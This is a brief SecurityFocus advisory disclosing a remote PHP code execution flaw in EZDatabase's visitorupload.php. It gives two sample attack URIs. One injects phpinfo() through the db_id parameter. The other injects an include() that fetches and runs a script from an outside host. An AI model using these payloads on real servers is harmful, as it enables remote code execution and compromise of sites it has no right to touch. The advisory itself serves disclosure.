EZDatabaseRemote PHP Script Code Execution Vulnerability

No exploit is required.

Sample URIs have been provided:
http://www.example.com/visitorupload.php?db_id=;phpinfo()
http://www.example.com/visitorupload.php?db_id=;include(_GET[test])&test=http://www.example2.com/script.php


 

Privacy Statement
Copyright 2010, SecurityFocus